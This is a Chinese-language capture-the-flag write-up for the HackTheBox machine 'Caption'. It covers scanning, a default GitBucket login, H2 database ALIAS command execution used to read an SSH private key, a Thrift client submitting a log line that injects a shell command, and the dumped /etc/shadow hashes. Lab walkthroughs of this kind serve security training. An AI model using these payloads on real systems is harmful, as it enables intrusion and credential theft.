Caption - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Caption
• 10.10.11.33

端口扫描

22，80，8080:

$ nmap -sC -sV -Pn 10.10.11.33
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-18 13:19 CST
Nmap scan report for caption.htb (10.10.11.33)
Host is up (0.096s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http-proxy HAProxy http proxy 2.0.0 or later
|_http-title: Caption Portal Login
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Werkzeug/3.0.1 Python/3.10.12
8080/tcp open  http       Jetty
|_http-title: GitBucket
Service Info: OS: Linux; Device: load balancer; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.15 seconds

80

需要加hosts：

10.10.11.33 caption.htb

需要登录：

8080

是一个GitBucket：

GitBucket

默认账号密码登录：

• gitbucket/README.md at master · gitbucket/gitbucket
  https://github.com/gitbucket/gitbucket/blob/master/README.md#installation

root : root

Logservice

看起来可能有命令注入：

Caption-Portal

查看commoits,历史版本配置文件中可以得到一组账号密码：

margo ： vFr&cS2#0!

Caption-Portal

得到的账号密码可以登录80的Portal：

logs

访问是403：

GitBucket dbviewer(非预期)

GitBucket 自带的dbviewer功能可以执行sql，后端是H2数据库：

• Abusing H2 Database ALIAS - Gambler - Hacking and other stuffs
  https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

参考执行命令，得到margo私钥：

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;

CALL SHELLEXEC('id')

CALL SHELLEXEC('cat /home/margo/.ssh/id_ecdsa')

预期 user

预期方式是请求走私

• 使用 H2CSmuggler 通过 HTTP2 升级绕过 HAproxy ACL
• 毒化缓存并在 UTM_Source 跟踪器中放置 XSS 有效载荷
• 获得管理员 Cookie，使用它通过 h2csmuggler 访问日志页面
• 查看日志，发现有一个 margo 使用的 ecdsa 密钥
• 谷歌搜索我们下载日志的 URL，发现其copyparty存在文件泄露漏洞
• 然后读取私钥

参考：

• HackTheBox - Caption - YouTube
  https://www.youtube.com/watch?v=JY_xds4LsW0
• HTB: Caption | 0xdf hacks stuff
  https://0xdf.gitlab.io/2025/01/25/htb-caption.html#

user flag

使用得到的私钥登录：

信息

运行pspy64可以发现和log相关的东西，前面在gitbucket里也可以看到可能的命令注入：

thrift

另外LogService代码中也可以看到Thrift 文件：

• Apache Thrift - Python
  https://thrift.apache.org/tutorial/py.html

参考文档，克隆项目后运行生成代码：

git clone http://caption.htb:8080/git/root/Logservice.git

thrift --gen py log_service.thrift

查看生成的代码可以确认是能够控制filePath调用log，端口是 9090也可以查看本地端口确认：

命令注入 & root flag

然后就可以自己根据代码逻辑创建恶意日志文件，然后自定义客户端连接服务，提交恶意日志，触发命令注入：

需要转发端口本地运行客户端，server上没python thrift库：

tar czvf gen-py.tar gen-py
scp -i margo_id_ecdsa margo@10.10.11.33:/tmp/miao/Logservice/gen-py.tar .

ssh -i margo_id_ecdsa margo@10.10.11.33 -L 9095:127.0.0.1:9090

client.py

from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('localhost', 9095)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()

    try:
        log_file_path = "/tmp/miao/miao.log"
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)
   
    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")

    transport.close()

if __name__ == '__main__':
    main()

miao.log

127.0.0.1 "user-agent":"'; /bin/bash /tmp/miao/shell.sh  #"

shadow

root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7:::
margo:$y$j9T$1.nErPXvyX8GM8SBRu8/B1$rCxIQkAu/A5K6b5xIZBJ6oeKfPp6R3WHDds/Z1OTEZ8:19956:0:99999:7:::
ruth:$y$j9T$8eN6xHfvLg4evyRqa2g7l1$AgJWIup1DAeX.Vo1wr69..LMTys7hBGepHknEKPwMOB:19960:0:99999:7:::

参考资料

• gitbucket/README.md at master · gitbucket/gitbucket
  https://github.com/gitbucket/gitbucket/blob/master/README.md#installation
• Abusing H2 Database ALIAS - Gambler - Hacking and other stuffs
  https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
• Apache Thrift - Python
  https://thrift.apache.org/tutorial/py.html
• HackTheBox - Caption - YouTube
  https://www.youtube.com/watch?v=JY_xds4LsW0
• HTB: Caption | 0xdf hacks stuff
  https://0xdf.gitlab.io/2025/01/25/htb-caption.html#